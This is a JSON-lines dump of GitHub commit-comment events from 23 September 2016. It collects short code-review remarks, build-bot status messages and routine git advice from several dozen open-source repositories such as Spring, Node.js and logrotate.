{"id":"4610120551","type":"CommitCommentEvent","actor":{"login":"rstoyanchev"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19150688,"position":135,"line":404,"path":"spring-web-reactive/src/test/java/org/springframework/web/reactive/result/method/annotation/RequestMappingMessageConversionIntegrationTests.java","commit_id":"48d67a245b0d7742a6a2bf0b5e801c5e00bc91bf","created_at":"2016-09-23T18:20:33Z","updated_at":"2016-09-23T18:20:33Z","body":"You can add an `@ExceptionHandler` method. If the error occurs before the first item is published, you can still change to a different response status and body."}},"created_at":"2016-09-23T18:20:33Z"}
{"id":"4610122737","type":"CommitCommentEvent","actor":{"login":"rachid45"},"repo":{"name":"bachvtuan/Backup-To-Google-Drive"},"payload":{"comment":{"id":19150693,"position":null,"line":null,"path":null,"commit_id":"da5fe649f2e5c76328b227d08752c73b8f2757ab","created_at":"2016-09-23T18:21:01Z","updated_at":"2016-09-23T18:21:01Z","body":"dhit"}},"created_at":"2016-09-23T18:21:01Z"}
{"id":"4610123027","type":"CommitCommentEvent","actor":{"login":"mjk912"},"repo":{"name":"koush/InkwireResources"},"payload":{"comment":{"id":19150696,"position":null,"line":null,"path":null,"commit_id":"b7cd951508b3a38875b8db58254d4afcfe24f9bb","created_at":"2016-09-23T18:21:04Z","updated_at":"2016-09-23T18:21:04Z","body":"\"mit Dir\", not \"mir Dir\". \r\n☺️"}},"created_at":"2016-09-23T18:21:04Z"}
{"id":"4610123140","type":"CommitCommentEvent","actor":{"login":"kvangent"},"repo":{"name":"kvangent/PokeAlarm"},"payload":{"comment":{"id":19150697,"position":null,"line":null,"path":null,"commit_id":"73873a14fa95444f021254531bee8ecae6a483c3","created_at":"2016-09-23T18:21:05Z","updated_at":"2016-09-23T18:21:05Z","body":"The filters will be additive, just like all the filters up until this point. If you limit by IV by 80 and distance by 1000, you will get alerted for any pokemon with an IV over 80 and a distance away of less than 1000. "}},"created_at":"2016-09-23T18:21:05Z"}
{"id":"4610124766","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19150702,"position":null,"line":null,"path":null,"commit_id":"479553ffe6508f1c727182594964b8bc5a77b605","created_at":"2016-09-23T18:21:25Z","updated_at":"2016-09-23T18:21:25Z","body":"Actualizo a la versión commit https://github.com/DjangoGirls/tutorial/commit/f11f359bd3b1f044f33e5bd77ff796fc17670f7c\r\n\r\nteniendo en cuenta el diff:\r\ntutorial/en/django_views$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c ."}},"created_at":"2016-09-23T18:21:25Z"}
{"id":"4610126287","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19150710,"position":null,"line":null,"path":null,"commit_id":"40dcb3a4a2fde4abc16d4ca15c22384dc873b331","created_at":"2016-09-23T18:21:42Z","updated_at":"2016-09-23T18:21:42Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40dcb3a4a2fde4abc16d4ca15c22384dc873b331-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40dcb3a4a2fde4abc16d4ca15c22384dc873b331-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T18:21:42Z"}
{"id":"4610130493","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":19150718,"position":null,"line":null,"path":null,"commit_id":"1fd28ffb2fd096e7df1fca308e16eb052af87c89","created_at":"2016-09-23T18:22:31Z","updated_at":"2016-09-23T18:22:31Z","body":"👍 "}},"created_at":"2016-09-23T18:22:31Z"}
{"id":"4610130499","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"logrotate/logrotate"},"payload":{"comment":{"id":19150719,"position":null,"line":null,"path":null,"commit_id":"b4c9091fc011ec9c449553ea8bfc5a2b04d887ce","created_at":"2016-09-23T18:22:31Z","updated_at":"2016-09-23T18:22:31Z","body":"not sure if github supports this (i know gitlab doesn't yet because underlying rugged library doesnt), but git commandline client can handle such merges fine.\r\n\r\nthis means you can ask contributors of PR to fill changelog entry themselves.\r\n\r\nhttps://gitlab.com/gitlab-org/gitlab-ce/issues/17325"}},"created_at":"2016-09-23T18:22:31Z"}
{"id":"4610132119","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19150728,"position":null,"line":null,"path":null,"commit_id":"beed4bb985fe6fb5b74361d79ad27dd2395b9285","created_at":"2016-09-23T18:22:52Z","updated_at":"2016-09-23T18:22:52Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 262](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1226&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-23T18:22:52Z"}
{"id":"4610134392","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19150731,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T18:23:17Z","updated_at":"2016-09-23T18:23:17Z","body":"This must be the one. GL for LTC!"}},"created_at":"2016-09-23T18:23:17Z"}
{"id":"4610135019","type":"CommitCommentEvent","actor":{"login":"williamzh"},"repo":{"name":"Merchello/Merchello"},"payload":{"comment":{"id":19150734,"position":null,"line":null,"path":null,"commit_id":"3a0e91ed36085aee368f85567ba983a2e3adb867","created_at":"2016-09-23T18:23:25Z","updated_at":"2016-09-23T18:23:25Z","body":"Sure, see M-1137 :)"}},"created_at":"2016-09-23T18:23:25Z"}
{"id":"4610141171","type":"CommitCommentEvent","actor":{"login":"kiorky"},"repo":{"name":"makinacorpus/corpus-django"},"payload":{"comment":{"id":19150758,"position":null,"line":null,"path":null,"commit_id":"2f62a85d944c875d78a709b57059310c2e848a89","created_at":"2016-09-23T18:24:41Z","updated_at":"2016-09-23T18:24:41Z","body":"@ychab @Gagaro, le .coveragerc bien placé, ça règle tous les pb... pour tox.\r\nEt cerise, ca le simplifie pas mal aussi."}},"created_at":"2016-09-23T18:24:41Z"}
{"id":"4610146952","type":"CommitCommentEvent","actor":{"login":"mscdex"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19150781,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:25:51Z","updated_at":"2016-09-23T18:25:51Z","body":"Why this change? We should be using the new `Buffer` methods since the constructor form is deprecated."}},"created_at":"2016-09-23T18:25:51Z"}
{"id":"4610146889","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope-http-statistics"},"payload":{"comment":{"id":19150782,"position":13,"line":16,"path":"Makefile","commit_id":"1ead14a0f9af1604dabdea241cea96ebe74a851c","created_at":"2016-09-23T18:25:52Z","updated_at":"2016-09-23T18:25:52Z","body":"http-requests.py does not exist anymore.\r\n\r\nDockerfile needs to be updated as well."}},"created_at":"2016-09-23T18:25:52Z"}
{"id":"4610147333","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":19150783,"position":null,"line":null,"path":null,"commit_id":"3e2a58469e7dcdf9955ff442b512615bb938a966","created_at":"2016-09-23T18:25:57Z","updated_at":"2016-09-23T18:25:57Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.263.3e2a58469e7dcdf9955ff442b512615bb938a966](http://build.palaso.org/viewLog.html?buildId=77099&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1496, ignored: 17 Build time: 00:08:21"}},"created_at":"2016-09-23T18:25:57Z"}
{"id":"4610148859","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19150789,"position":11,"line":8,"path":"js/script.js","commit_id":"8e705fa873e401cee730038255910e56eafba688","created_at":"2016-09-23T18:26:16Z","updated_at":"2016-09-23T18:26:16Z","body":"stawiaj spacje przed warunkiem np\r\n\r\n`if (val > 0) {`"}},"created_at":"2016-09-23T18:26:16Z"}
{"id":"4610152710","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19150799,"position":19,"line":16,"path":"js/script.js","commit_id":"8e705fa873e401cee730038255910e56eafba688","created_at":"2016-09-23T18:27:01Z","updated_at":"2016-09-23T18:27:01Z","body":"możesz sobie poczytać i przerobić w wolnej chwili ten przykład wykorzystując \r\n\r\nhttps://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Operators/Conditional_Operator"}},"created_at":"2016-09-23T18:27:01Z"}
{"id":"4610154364","type":"CommitCommentEvent","actor":{"login":"KagamiChan"},"repo":{"name":"poooi/poi"},"payload":{"comment":{"id":19150807,"position":null,"line":null,"path":null,"commit_id":"8d307e55a82c931160d7b065b5e6cabf83a321dc","created_at":"2016-09-23T18:27:21Z","updated_at":"2016-09-23T18:27:21Z","body":"感觉淡出的时间有点快\r\n建议把 `#MainView .resource-panel .additional-value` 的 `transition` 时间调长一点，同时为了保证显示淡入的速度，分别在 `.dec` 和 `.inc` 里面用新的 `transition` 覆盖掉"}},"created_at":"2016-09-23T18:27:21Z"}
{"id":"4610157808","type":"CommitCommentEvent","actor":{"login":"fippo"},"repo":{"name":"andyet/SimpleWebRTC"},"payload":{"comment":{"id":19150819,"position":null,"line":null,"path":null,"commit_id":"50e70f63e51b285a7346e4621eef397c6fe287a4","created_at":"2016-09-23T18:28:03Z","updated_at":"2016-09-23T18:28:03Z","body":"I think we should give you the power to do it. wdyt @legastero @xdumaine?"}},"created_at":"2016-09-23T18:28:03Z"}
{"id":"4610158786","type":"CommitCommentEvent","actor":{"login":"magnitronus"},"repo":{"name":"troyanskiy/ng2-resource-rest"},"payload":{"comment":{"id":19150822,"position":null,"line":null,"path":null,"commit_id":"b8c68ed45578bf1aa32941cdddd478b247a85dc1","created_at":"2016-09-23T18:28:13Z","updated_at":"2016-09-23T18:28:13Z","body":"Hi @troyanskiy. Reason of  issue with circular dependencity (Unexpected value 'AppComponent' ), it is rxjs or reflect ?"}},"created_at":"2016-09-23T18:28:13Z"}
{"id":"4610171541","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19150856,"position":null,"line":null,"path":null,"commit_id":"1943db7f2049ef6300509d596709f1c924493224","created_at":"2016-09-23T18:30:42Z","updated_at":"2016-09-23T18:30:42Z","body":"Agrego signos de Admiración en la linea 4 \r\n¡Es hora de deshacerse del error que hemos creado en el capítulo anterior! :)\r\n\r\nActualizo a la versión commit https://github.com/DjangoGirls/tutorial/commit/f11f359bd3b1f044f33e5bd77ff796fc17670f7c\r\n\r\nteniendo en cuenta el diff:\r\ntutorial/en/django_views$ git diff f11f359bd3b1f044f33e5bd77ff796fc17670f7c .\r\n\r\n\r\n"}},"created_at":"2016-09-23T18:30:42Z"}
{"id":"4610173397","type":"CommitCommentEvent","actor":{"login":"Bontgoy"},"repo":{"name":"adriennebelle/phase-0-tracks"},"payload":{"comment":{"id":19150861,"position":null,"line":null,"path":null,"commit_id":"6de101bb726732c6d5cbf9f6091648c2aa429b62","created_at":"2016-09-23T18:31:05Z","updated_at":"2016-09-23T18:31:05Z","body":":shipit: "}},"created_at":"2016-09-23T18:31:05Z"}
{"id":"4610174130","type":"CommitCommentEvent","actor":{"login":"Elroy415"},"repo":{"name":"Elroy415/Hello-world"},"payload":{"comment":{"id":19150868,"position":null,"line":null,"path":null,"commit_id":"1d2d7ca623833faa8a453a80065fe20d4fe4ab89","created_at":"2016-09-23T18:31:14Z","updated_at":"2016-09-23T18:31:14Z","body":"First timer at this game. I hope to get better."}},"created_at":"2016-09-23T18:31:14Z"}
{"id":"4610174967","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19150870,"position":14,"line":7,"path":"js/script.js","commit_id":"1b84d1adfc99cef26cf9f0d215d74444320d1685","created_at":"2016-09-23T18:31:24Z","updated_at":"2016-09-23T18:31:24Z","body":"stawiaj spacje po warunku"}},"created_at":"2016-09-23T18:31:24Z"}
{"id":"4610181973","type":"CommitCommentEvent","actor":{"login":"mentor-kk"},"repo":{"name":"zosinski/bootcamp-task-8"},"payload":{"comment":{"id":19150883,"position":29,"line":22,"path":"js/script.js","commit_id":"1b84d1adfc99cef26cf9f0d215d74444320d1685","created_at":"2016-09-23T18:32:46Z","updated_at":"2016-09-23T18:32:46Z","body":"ten `else` jest niepotrzebny. Jeśli kod dojdzie do tego miejsca to znaczy, że warunek z #19 nie został spełniony. `Return` zwraca wartość wychodząc z funkcji."}},"created_at":"2016-09-23T18:32:46Z"}
{"id":"4610187058","type":"CommitCommentEvent","actor":{"login":"kdudka"},"repo":{"name":"logrotate/logrotate"},"payload":{"comment":{"id":19150900,"position":null,"line":null,"path":null,"commit_id":"b4c9091fc011ec9c449553ea8bfc5a2b04d887ce","created_at":"2016-09-23T18:33:46Z","updated_at":"2016-09-23T18:33:46Z","body":"Ask where?  README.md?  Feel free to change the docs accordingly..."}},"created_at":"2016-09-23T18:33:46Z"}
{"id":"4610188694","type":"CommitCommentEvent","actor":{"login":"Ypnose"},"repo":{"name":"Ypnose/ahrf"},"payload":{"comment":{"id":19150904,"position":null,"line":null,"path":null,"commit_id":"99d5691c6f36c62699b89a62db09ac29f852d4b2","created_at":"2016-09-23T18:34:05Z","updated_at":"2016-09-23T18:34:05Z","body":"Yeah, that is the general idea. I'm considering adding bold too."}},"created_at":"2016-09-23T18:34:05Z"}
{"id":"4610190242","type":"CommitCommentEvent","actor":{"login":"kdzwinel"},"repo":{"name":"brainly/style-guide"},"payload":{"comment":{"id":19150907,"position":13,"line":2,"path":"src/images/icons/answer.svg","commit_id":"5a6ad18e4ed8eca011b8b332a7a544dd1151c940","created_at":"2016-09-23T18:34:22Z","updated_at":"2016-09-23T18:34:22Z","body":"AFAIK fill-rule can be removed"}},"created_at":"2016-09-23T18:34:22Z"}
{"id":"4610193283","type":"CommitCommentEvent","actor":{"login":"stephensmalley"},"repo":{"name":"williamcroberts/selinux"},"payload":{"comment":{"id":19150913,"position":11,"line":11,"path":"libselinux/ANDROID_FORK","commit_id":"00114f235534035fb47a9114d6c9b6caebf7dd48","created_at":"2016-09-23T18:34:56Z","updated_at":"2016-09-23T18:34:56Z","body":"Shouldn't this just replace the content of README.android?  That's the conventional file for pointing to upstream and explaining differences."}},"created_at":"2016-09-23T18:34:56Z"}
{"id":"4610194969","type":"CommitCommentEvent","actor":{"login":"Ypnose"},"repo":{"name":"Ypnose/ahrf"},"payload":{"comment":{"id":19150917,"position":null,"line":null,"path":null,"commit_id":"400f058fa8a07b4a70f6f6da678a0149c9f2318d","created_at":"2016-09-23T18:35:15Z","updated_at":"2016-09-23T18:35:15Z","body":"Will add a specific class for each ```<td>``` too. It will be much easier with CSS."}},"created_at":"2016-09-23T18:35:15Z"}
{"id":"4610196994","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19150922,"position":null,"line":null,"path":null,"commit_id":"0eb8b92064db014100d6ed2b618c8cf635b37c26","created_at":"2016-09-23T18:35:40Z","updated_at":"2016-09-23T18:35:40Z","body":"Cool. Good luck for LTC!"}},"created_at":"2016-09-23T18:35:40Z"}
{"id":"4610201510","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"madsjulia/Mads.jl"},"payload":{"comment":{"id":19150936,"position":4,"line":25,"path":"REQUIRE","commit_id":"db827c14bbb8b88499c01fd13624bdc848837ad2","created_at":"2016-09-23T18:36:36Z","updated_at":"2016-09-23T18:36:36Z","body":"best to declare a minimum version that implements the features you need, here I think it's 0.7.15 for `Compat.String`"}},"created_at":"2016-09-23T18:36:36Z"}
{"id":"4610202284","type":"CommitCommentEvent","actor":{"login":"glensc"},"repo":{"name":"logrotate/logrotate"},"payload":{"comment":{"id":19150941,"position":null,"line":null,"path":null,"commit_id":"b4c9091fc011ec9c449553ea8bfc5a2b04d887ce","created_at":"2016-09-23T18:36:45Z","updated_at":"2016-09-23T18:36:45Z","body":"i meant free form comment in PR when people submit it.\r\n\r\ngithub suppors `CONTRIBUTING.md` document which is added as help text for users submitting PR\r\nhttps://github.com/blog/1184-contributing-guidelines\r\n\r\nsuch file (or any information how to contribute) is missing currently in the repository\r\n\r\n"}},"created_at":"2016-09-23T18:36:45Z"}
{"id":"4610202646","type":"CommitCommentEvent","actor":{"login":"floralvikings"},"repo":{"name":"abrinkman94/esso"},"payload":{"comment":{"id":19150943,"position":15,"line":54,"path":"core/src/com/jenjinstudios/esso/actor/Actor.java","commit_id":"09f6b7c7f894f6562e0099c91ef699c4a90b669c","created_at":"2016-09-23T18:36:50Z","updated_at":"2016-09-23T18:36:50Z","body":"For these methods: instead of using constant values for what is considered \"low\", \"medium\", and \"high\", maybe do something like this, so that the status is calculated as a percentage of the maximum:\r\n\r\n```java\r\npublic boolean isLowHealth() { return currentHealth <= 0.3 * maxHealth; }\r\n\r\npublic boolean isHighHealth() { return currentHealth >= 0.5 * maxHealth; }\r\n\r\n// if health isn't high or low, then it has to be medium\r\npublic boolean isMediumHealth() { return !isLowHealth() && !isHighHealth(); };\r\n```\r\n\r\nThis is slightly less performant than using the integer constants because of the math (although I think the JIT compiler might optimize the values into constants), but \"high\", \"medium\", and \"low\" health would scale with the value of `maxHealth`.\r\n\r\nYou could actually pull the values for low health (`maxHealth * 0.3`) and high health (`maxHealth * 0.5`) into fields whenever `maxHealth` is set, so that they only have to be calculated when necessary:\r\n\r\n```java\r\nprivate int highHealth;\r\nprivate int lowHealth;\r\npublic void setMaxHealth(int maxHealth) {\r\n    this.maxHealth = maxHealth;\r\n    this.lowHealth = 0.3 * maxHealth;\r\n    this.highHealth = 0.5 * maxHealth;\r\n}\r\n```\r\n\r\nJust food for thought."}},"created_at":"2016-09-23T18:36:50Z"}
{"id":"4610210997","type":"CommitCommentEvent","actor":{"login":"geoffreychiou"},"repo":{"name":"geoffreychiou/godel"},"payload":{"comment":{"id":19150960,"position":null,"line":null,"path":null,"commit_id":"4dfb1b296b3c78b55657c59095f9adad90a29181","created_at":"2016-09-23T18:38:26Z","updated_at":"2016-09-23T18:38:26Z","body":"Here are the changes I made @shaun-edwards"}},"created_at":"2016-09-23T18:38:26Z"}
{"id":"4610215226","type":"CommitCommentEvent","actor":{"login":"ruslangaripov"},"repo":{"name":"Serg-Norseman/GEDKeeper"},"payload":{"comment":{"id":19150971,"position":null,"line":null,"path":null,"commit_id":"acbe1f0c1680f8d9522b8a1677fa07fe2d5a4b7f","created_at":"2016-09-23T18:39:16Z","updated_at":"2016-09-23T18:39:16Z","body":"Very saturated commit :+1: Especially on culture-related coding!"}},"created_at":"2016-09-23T18:39:16Z"}
{"id":"4610215553","type":"CommitCommentEvent","actor":{"login":"rayrempour9034"},"repo":{"name":"acimack9005/Grocery-App"},"payload":{"comment":{"id":19150973,"position":null,"line":null,"path":null,"commit_id":"2508694dfbd23e4923d8b8014b5397668ad639d7","created_at":"2016-09-23T18:39:19Z","updated_at":"2016-09-23T18:39:19Z","body":"[MyApp.xcodeproj.zip](https://github.com/acimack9005/Grocery-App/files/490414/MyApp.xcodeproj.zip)\r\n"}},"created_at":"2016-09-23T18:39:19Z"}
{"id":"4610226203","type":"CommitCommentEvent","actor":{"login":"danfowler"},"repo":{"name":"centraldedados/datapaka"},"payload":{"comment":{"id":19151002,"position":4,"line":135,"path":"datapaka","commit_id":"56e829d00e20b70c115f786c914649ddc0645538","created_at":"2016-09-23T18:41:23Z","updated_at":"2016-09-23T18:41:23Z","body":"Should this be `outfilename` instead of `outfile`?\r\n\r\n```\r\nTraceback (most recent call last):\r\n  File \"/Users/dan/open_knowledge/frictionless_data/datapaka/datapaka\", line 133, in <module>\r\n    print \"All done! File saved as \" + Style.BRIGHT + outfile + Style.RESET_ALL + \". Ta!\"\r\nNameError: name 'outfile' is not defined\r\n```"}},"created_at":"2016-09-23T18:41:23Z"}
{"id":"4610228430","type":"CommitCommentEvent","actor":{"login":"jonhartzler"},"repo":{"name":"ndlib/honeycomb"},"payload":{"comment":{"id":19151003,"position":7,"line":12,"path":"app/controllers/showcases_controller.rb","commit_id":"66f725c6378ffc4eb9c82705eac1d8a2bb457931","created_at":"2016-09-23T18:41:49Z","updated_at":"2016-09-23T18:41:49Z","body":"I think I would like to see a unit test on this.    If you take this code and put it into a service that takes showcases and returns this json i think you can test it pretty easily.  \r\n\r\n"}},"created_at":"2016-09-23T18:41:49Z"}
{"id":"4610236974","type":"CommitCommentEvent","actor":{"login":"kdudka"},"repo":{"name":"logrotate/logrotate"},"payload":{"comment":{"id":19151019,"position":null,"line":null,"path":null,"commit_id":"b4c9091fc011ec9c449553ea8bfc5a2b04d887ce","created_at":"2016-09-23T18:43:28Z","updated_at":"2016-09-23T18:43:28Z","body":"```CONTRIBUTING.md``` sounds useful.  If you feel like writing an initial version of the file, please go ahead!"}},"created_at":"2016-09-23T18:43:28Z"}
{"id":"4610246154","type":"CommitCommentEvent","actor":{"login":"bigSouza"},"repo":{"name":"bigSouza/coded-reality"},"payload":{"comment":{"id":19151037,"position":null,"line":null,"path":null,"commit_id":"2235767bab6149862bdff73e8b91b96cff45221d","created_at":"2016-09-23T18:45:17Z","updated_at":"2016-09-23T18:45:17Z","body":"Think I may start fresh @comments "}},"created_at":"2016-09-23T18:45:17Z"}
{"id":"4610248215","type":"CommitCommentEvent","actor":{"login":"thijzert"},"repo":{"name":"Overtonesinger/xmlseclibs"},"payload":{"comment":{"id":19151040,"position":null,"line":null,"path":null,"commit_id":"d3aff88ebf212a22046635740086a12f3d38597c","created_at":"2016-09-23T18:45:41Z","updated_at":"2016-09-23T18:45:41Z","body":"Glad you liked it!\r\n\r\nThough, in the future, you may want to consider simply merging the branch in my fork rather than copying the changes manually - character by character, as you say. Not only will this save you a lot of time, it will also preserve things like timestamps and authorship, since copying the changes over manually resets the author to, well, _you_, which is considered a faux-pas in many circles.\r\n(Though with the amount of love you gave me in the commit message, I can hardly complain ;-))\r\n\r\nThe commands below would have achieved the result you were looking for. Use them to your advantage.\r\n```\r\ngit remote add  thijzerts-clone   https://github.com/thijzert/xmlseclibs.git\r\ngit fetch  thijzerts-clone\r\ngit merge  thijzerts-clone/wsse-BinarySecurityToken  -m \"Merged the branch 'wsse-BinarySecurityToken' from @thijzert's fork\"\r\n```"}},"created_at":"2016-09-23T18:45:41Z"}
{"id":"4610250545","type":"CommitCommentEvent","actor":{"login":"ishubhamsingh"},"repo":{"name":"ishubhamsingh/android_manifest"},"payload":{"comment":{"id":19151053,"position":null,"line":null,"path":null,"commit_id":"cb99b0484ca105edc09261ffd5eb121646fd1e85","created_at":"2016-09-23T18:46:08Z","updated_at":"2016-09-23T18:46:08Z","body":"ok"}},"created_at":"2016-09-23T18:46:08Z"}
{"id":"4610252608","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19151062,"position":null,"line":null,"path":null,"commit_id":"77595ff35ad3f9bbfc0bb7ca74e499ff94f81674","created_at":"2016-09-23T18:46:30Z","updated_at":"2016-09-23T18:46:30Z","body":"os_2_0_fix_static_build (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-77595ff35ad3f9bbfc0bb7ca74e499ff94f81674-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-23T18:46:30Z"}
{"id":"4610256583","type":"CommitCommentEvent","actor":{"login":"bioglaze"},"repo":{"name":"baldurk/renderdoc"},"payload":{"comment":{"id":19151072,"position":null,"line":null,"path":null,"commit_id":"e22e81304935db0b6a06225a92f7065bb0c9d464","created_at":"2016-09-23T18:47:16Z","updated_at":"2016-09-23T18:47:16Z","body":"This doesn't compile on my VS2015 on Development/x64 target:\r\n\r\nerror C2220: warning treated as error - no 'object' file generated\r\n...\\renderdoc\\driver\\d3d12\\d3d12_debug.cpp(1796): warning C4127: conditional expression is constant"}},"created_at":"2016-09-23T18:47:16Z"}
{"id":"4610256850","type":"CommitCommentEvent","actor":{"login":"uxmal"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19151076,"position":18,"line":138,"path":"src/Decompiler/Analysis/ExpressionPropagator.cs","commit_id":"1694a64b235994cbf0ee7f055ba6e33e427328e5","created_at":"2016-09-23T18:47:19Z","updated_at":"2016-09-23T18:47:19Z","body":"@ptomin: this is a little slow (not happy about the O(n^2) but the `analysis-development` branch deals with this directly. Should I feed this to the master branch?\r\n"}},"created_at":"2016-09-23T18:47:19Z"}
{"id":"4610260444","type":"CommitCommentEvent","actor":{"login":"n054"},"repo":{"name":"n054/runtime"},"payload":{"comment":{"id":19151085,"position":null,"line":null,"path":null,"commit_id":"dc8a49c299b94751810e6b4788b8ee9217cdf978","created_at":"2016-09-23T18:48:01Z","updated_at":"2016-09-23T18:48:01Z","body":"$ git push origin"}},"created_at":"2016-09-23T18:48:01Z"}
{"id":"4610266614","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19151099,"position":null,"line":null,"path":null,"commit_id":"beed4bb985fe6fb5b74361d79ad27dd2395b9285","created_at":"2016-09-23T18:49:12Z","updated_at":"2016-09-23T18:49:12Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 262](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1226&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:26:20"}},"created_at":"2016-09-23T18:49:12Z"}
{"id":"4610275913","type":"CommitCommentEvent","actor":{"login":"eugeneo"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19151118,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:50:58Z","updated_at":"2016-09-23T18:50:58Z","body":"I switched there for consistency with the rest of this test case. Please take a look - https://github.com/nodejs/node/pull/8748"}},"created_at":"2016-09-23T18:50:58Z"}
{"id":"4610276490","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"sisl/BayesNets.jl"},"payload":{"comment":{"id":19151120,"position":null,"line":null,"path":null,"commit_id":"dfcbf55a9ab7caa02b05175f6ac413646dbee953","created_at":"2016-09-23T18:51:06Z","updated_at":"2016-09-23T18:51:06Z","body":"where's `Graph` imported or defined from?"}},"created_at":"2016-09-23T18:51:06Z"}
{"id":"4610284515","type":"CommitCommentEvent","actor":{"login":"jasnell"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19151135,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:52:39Z","updated_at":"2016-09-23T18:52:39Z","body":"Still, this likely should not have been changed. There are plenty of other places here where `Buffer.from` is used. If anything, this should have been changed to `Buffer.alloc(0)`."}},"created_at":"2016-09-23T18:52:39Z"}
{"id":"4610285131","type":"CommitCommentEvent","actor":{"login":"Orvid"},"repo":{"name":"facebook/folly"},"payload":{"comment":{"id":19151136,"position":null,"line":null,"path":null,"commit_id":"70618258130b18cae08ecd5e88de518ab38425fd","created_at":"2016-09-23T18:52:47Z","updated_at":"2016-09-23T18:52:47Z","body":"I would suspect you're building against an older version of Folly, as, if Wangle didn't build, most of our internal stuff wouldn't be able to either."}},"created_at":"2016-09-23T18:52:47Z"}
{"id":"4610287581","type":"CommitCommentEvent","actor":{"login":"jasnell"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19151144,"position":32,"line":126,"path":"test/inspector/inspector-helper.js","commit_id":"5acbeb0272958cfc2aa51e56c2bfafc6584c6cb5","created_at":"2016-09-23T18:53:15Z","updated_at":"2016-09-23T18:53:15Z","body":"That said, woohoo! tests are passing on macos sierra now."}},"created_at":"2016-09-23T18:53:15Z"}
{"id":"4610287582","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19151146,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-23T18:53:17Z","updated_at":"2016-09-23T18:53:17Z","body":"大神厉害 谢谢大神 非常感谢大神"}},"created_at":"2016-09-23T18:53:17Z"}
